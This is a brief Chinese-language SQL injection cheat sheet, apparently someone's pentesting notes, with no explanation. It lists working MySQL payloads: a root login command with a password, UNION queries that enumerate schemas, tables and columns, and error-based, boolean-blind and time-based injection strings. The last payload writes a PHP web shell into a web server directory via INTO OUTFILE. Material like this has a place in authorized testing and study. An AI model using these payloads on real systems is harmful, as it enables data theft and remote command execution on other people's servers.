1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
### mysql
练接
mysql -u root -p'root' -h 192.168.199.197 -P 3306
### 联合查询
1' union select 1,2,3-- -
查数据库
database()
1' union select schema_name,1 from information_schema.schemata
查表
1' union select group_concat(table_name),database() from information_schema.tables where table_schema = database() #
查列
1' union select group_concat(column_name),database() from information_schema.columns where table_schema = database() #
### 报错注入
floor
-1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)y)--+
extractvalue
-1' and extractvalue(1,concat(0x7e,(select user()),0x7e))--+
updatexml
-1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
###布尔盲注
1' and length(database()>=8)--
1' and left(database(),1)='a'--
1' and substr(database(),2,1)='a'--
### 时间注入
1’ and if(length(database())=4,sleep(5),1)
### shell
写文件
'+UNION+SELECT+null,"<%3fphp+system($_GET['cmd'])%3b%3f>",+null,+null+INTO+OUTFILE+"/var/www/html/tmp/a.php"+--+//
|